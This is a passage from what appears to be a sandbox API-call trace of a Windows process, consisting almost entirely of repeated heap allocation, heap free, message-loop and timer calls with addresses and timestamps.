hWnd=0x10076, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.069] GetClassNameW (in: hWnd=0x10076, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd850 | out: hHeap=0x12c0000) returned 1 [0131.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0131.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7d8 | out: hHeap=0x12c0000) returned 1 [0131.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0131.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4f0 | out: hHeap=0x12c0000) returned 1 [0131.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3e8 | out: hHeap=0x12c0000) returned 1 [0131.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd400 | out: hHeap=0x12c0000) returned 1 [0131.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff690 | out: hHeap=0x12c0000) returned 1 [0131.069] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0131.069] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0131.069] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0131.069] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0131.069] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0131.069] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0131.069] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.070] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.070] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0131.070] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0131.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0131.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0131.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.070] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df00 [0131.070] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df00 | out: hHeap=0x12c0000) returned 1 [0131.070] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0131.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0131.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0131.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0131.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0131.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0131.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0131.077] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0131.077] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0131.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0131.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0131.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0131.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0131.077] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e100 | out: hHeap=0x12c0000) returned 1 [0131.077] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0131.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0131.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0131.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0131.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0131.112] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.112] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0131.112] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0131.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0131.112] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0131.112] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0131.112] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e640 [0131.112] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.112] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e640 | out: hHeap=0x12c0000) returned 1 [0131.112] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0131.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0131.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0131.112] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0131.112] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0131.112] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0131.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0131.112] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.113] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0131.113] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.113] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.113] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0131.113] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0131.113] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0131.113] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0131.113] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.113] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0131.127] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.128] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0131.128] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.158] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.159] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0131.159] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0131.159] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0131.159] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0131.159] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.159] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e280 [0131.159] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.159] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e280 | out: hHeap=0x12c0000) returned 1 [0131.159] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.159] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0131.159] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0131.159] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0131.159] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0131.159] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0131.159] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0131.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0131.160] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0131.160] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0131.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0131.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0131.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0131.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0131.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0131.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0131.160] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0131.160] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0131.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0131.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0131.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0131.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e600 [0131.160] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e600 | out: hHeap=0x12c0000) returned 1 [0131.161] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0131.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0131.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0131.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0131.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e140 [0131.161] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e140 | out: hHeap=0x12c0000) returned 1 [0131.161] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0131.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0131.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0131.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0131.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0131.161] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0131.162] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0131.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0131.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0131.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0131.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0131.162] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0131.162] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0131.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0131.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0131.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0131.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0131.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0131.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0131.162] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0131.162] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0131.163] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0131.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0131.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0131.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.163] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0131.163] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0131.163] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.163] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.163] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0131.163] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0131.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0131.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0131.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.163] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0131.163] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0131.163] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.163] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.163] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.163] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0131.163] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0131.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0131.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0131.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.164] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0131.164] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0131.164] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.164] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0131.164] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0131.164] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0131.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0131.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0131.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0131.164] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e600 [0131.164] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e600 | out: hHeap=0x12c0000) returned 1 [0131.164] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.164] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.164] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0131.164] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0131.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: 